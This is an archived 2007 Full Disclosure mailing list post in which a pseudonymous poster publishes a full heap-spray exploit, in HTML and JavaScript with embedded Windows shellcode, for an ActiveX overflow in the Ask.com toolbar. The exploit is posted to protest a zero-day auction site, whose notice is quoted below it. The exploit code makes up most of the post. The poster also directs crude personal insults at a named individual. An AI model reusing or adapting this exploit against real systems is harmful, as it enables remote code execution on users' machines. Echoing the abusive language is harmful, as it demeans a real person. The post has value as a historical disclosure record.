Full Disclosure mailing list archives
Re: New Zeroday published
From: "Joey Mengele" <joey.mengele () hushmail com>
Date: Mon, 24 Sep 2007 12:46:54 -0400
Dear Security List Moderator, Proving itself to be the true iDefense of the New Millenium (TM), WabiSabiLabia has released a new worthless bug and exploit to their auction area [1]. Attached is an exploit for the bug, which is described by WabiSabiLabia at the end of this electronic correspondence. It is included inline as well as an attachment. STOP WABISABILABIA EXPLOITATION OF DISEASED HACKER OVERACHIEVERS! KILL ALL WABISABILABIA BUGS BEFORE SALE! YOU TOO CAN PREVENT FOREST FIRES! [2] J [1] http://www.wslabi.com/wabisabilabi/initPublishedBid.do? [2] Gadi Evron is a fat fuck who invented DNS ___ BEGIN ___ <html> <SCRIPT language="javascript"> // This is new technique I invent call 'heap fill attack' var str0ke = 0x0d0d0d0d; var sucks = unescape( // Launch the system calculator 100 times because what else? // This code currently not work on Solaris/Sparc "%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F% u5F8B%u0120" + "%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB% u543B%u0424" + "%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB% u245C%uC304" + "%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB% u808B%u00B0" + "%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%uF068%u048A%u685F% uFE98%u0E8A" + "%uFF57%u63E7%u6C61%u0063"); var dick = 0x400000; var j0hnson = sucks.length * 2; var spraySlideSize = dick - (j0hnson+0x38); var spraySlide = unescape("%u9090%u9090"); spraySlide = getSpraySlide(spraySlide,spraySlideSize); heapBlocks = (str0ke - 0x400000)/dick; memory = new Array();for (i=0;i<heapBlocks;i++) {memory[i] = spraySlide + sucks;} try{ gadi = new ActiveXObject( 'AskJeevesToolBar.SettingsPlugin.1' ); } catch(evron) { alert(evron); } netdev = "A"; while (netdev.length != 0x5e0) netdev += "A"; netdev += unescape("%0d%0d%0d%0d"); gadi.ShortFormat = netdev; function getSpraySlide(spraySlide, spraySlideSize) {while (spraySlide.length*2<spraySlideSize){ spraySlide += spraySlide;} spraySlide = spraySlide.substring(0,spraySlideSize/2); return spraySlide;} </script> </html> ___ END ___ On Mon, 24 Sep 2007 06:06:39 -0400 webmaster () wslabi com wrote:
NEW ZERODAY PUBLISHED
A new zeroday has been published with Wabisabilabi code
ZD-00000148
THIS ITEM IS SOLD UNDER THIS SCHEME: AUCTION
Title
ask.com toolbar remote vulnerability
Time to live
14 days, 20 hours, 52 minutes
Vulnerability type
client side
Affected system
Windows XP
Remote
true
Local
false
PoC
true
Public description
ask.com toolbar suffers from a remote vulnerability.
Affected version is 4.0.2.53. PoC is included. Further informations
for registered bidders only.
-------------------------
You received this newsletter because you ask to do
this.
If you don't want to receive its anymore or if you
didn't ask to receive its, follow the link below.
https://wslabi.com/wabisabilabi/initUnsubscribeNewsletter.do?unsubs
cribeKey=vorUuSZWl%2BIeVytn%2FqzINkgmIGYXxC5bvB4XUqsQKwrbOtcMr%2FvN
GpdBuP1PZ%2Fn0hBNb24xl%2Bl5VymAlSH3880%2FoYzxcUxflmW6JrGaF1Uo%3D[1]
Links:
------
[1]
https://wslabi.com/wabisabilabi/initUnsubscribeNewsletter.do?unsubs
cribeKey=vorUuSZWl%2BIeVytn%2FqzINkgmIGYXxC5bvB4XUqsQKwrbOtcMr%2FvN
GpdBuP1PZ%2Fn0hBNb24xl%2Bl5VymAlSH3880%2FoYzxcUxflmW6JrGaF1Uo%3D
-- Be your own boss today! Go to Technical School. Click here. http://tagline.hushmail.com/fc/Ioyw6h4fRTcB9r0dQYjSTJZMSmpBdlBRBdtflLQIMuFxabIbIvvX2w/
Attachment:
ZD-00000148.txt
Description:
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Re: New Zeroday published Joey Mengele (Sep 24)